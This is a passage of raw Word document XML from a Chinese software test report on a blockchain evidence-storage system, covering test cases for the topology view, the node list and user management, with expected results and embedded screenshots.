              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14450555" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="317" w:name="_Toc36487938"/>
      <w:bookmarkStart w:id="318" w:name="_Toc36573239"/>
      <w:bookmarkStart w:id="319" w:name="_Toc36630325"/>
      <w:r w:rsidRPr="00536672">
        <w:t>区块链存证测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="317"/>
      <w:bookmarkEnd w:id="318"/>
      <w:bookmarkEnd w:id="319"/>
    </w:p>
    <w:p w14:paraId="36EA4CBF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="320" w:name="_Toc36487939"/>
      <w:r w:rsidRPr="00536672">
        <w:t>拓扑图</w:t>
      </w:r>
      <w:bookmarkEnd w:id="320"/>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03203934" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="558EFE12"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69B5EBB4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>拓扑图</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6A66889A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="063F2715"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3FCB0408" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>功能测试、界面测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="70B8EB09" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A936777"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03F5332D"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78466B4E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="011DA020"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689495CF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:firstLineChars="200" w:firstLine="360"/>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查看IP分布信息和节点可信证实状态</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27440A28"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="07786887" wp14:editId="314EC3A2">
                  <wp:extent cx="4201160" cy="3072765"/>
                  <wp:effectExtent l="0" t="0" r="15240" b="635"/>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46"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201160" cy="3072765"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="788CBE91" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="408F9A2E"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601AA084" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="58D603B7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A77BFFB"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6F0CCB09" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25596F9B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="321" w:name="_Toc36487940"/>
      <w:r w:rsidRPr="00536672">
        <w:t>节点列表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="321"/>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49268FC0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="731B44E7"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782F4993" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>节点列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0253A50A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6765A29F"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411CA0DA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2D2993C8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DEF1BF1"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390FC5F1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="26BDE5EC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F172258"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258D56C6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A46A460" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="35B3E75B" wp14:editId="51BF6F2A">
                  <wp:extent cx="4189730" cy="1369060"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="2540"/>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47"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4189730" cy="1369060"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="431CC46D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="381887AF" wp14:editId="201A0DDB">
                  <wp:extent cx="4198620" cy="2035810"/>
                  <wp:effectExtent l="0" t="0" r="17780" b="21590"/>
                  <wp:docPr id="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48"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4198620" cy="2035810"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="41A8635D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="229256C3" wp14:editId="63174643">
                  <wp:extent cx="4191000" cy="1429385"/>
                  <wp:effectExtent l="0" t="0" r="0" b="18415"/>
                  <wp:docPr id="1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49"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4191000" cy="1429385"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="73F8B17C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0EEF66DD" wp14:editId="1149DCB1">
                  <wp:extent cx="4201795" cy="1273810"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="21590"/>
                  <wp:docPr id="1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50"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="1273810"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0D0000CA" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E2A5C95"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1A2EB5C5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="566AE810" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="542AFE07"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106038AC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E5595E3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="322" w:name="_Toc36487941"/>
      <w:r w:rsidRPr="00536672">
        <w:t>用户管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="322"/>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151BE064" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14640AC5"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5CFDF138" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>用户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="478E94E7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="697C1725"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5890D6D5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>开启、停用用户、搜索用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="63FB7B8B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43F32E7F"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634B8A0A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1D555515" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41BF8280"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6AFE3DC4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>在用户管理页面中，管理员可以查看当前区块链存证的用户，并且停用账号。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36947D2B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="59A432D0" wp14:editId="0B3E3E77">
                  <wp:extent cx="4190365" cy="2266315"/>
                  <wp:effectExtent l="0" t="0" r="635" b="19685"/>
                  <wp:docPr id="1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51"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4190365" cy="2266315"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7992A2EC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>点击列表中任意一行，可以查看用户详细信息，比如联系方式。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="098142CE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3EEC911C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DEF1A18" wp14:editId="08C8F3C6">
                  <wp:extent cx="4104005" cy="1686560"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="1524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2"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1686560"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1487A276" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>点击右上角的设置按钮可以管理用户的具体信息。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="327040B1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="176E8624" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="203C9985" wp14:editId="4FDA4BB2">
                  <wp:extent cx="4104005" cy="1974850"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="635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53"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1974850"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="061CE3A1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="263BF5CD" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DADC5F1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E8F9B0C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>开启、停用用户功能正常，搜索功能正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="04545F39" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
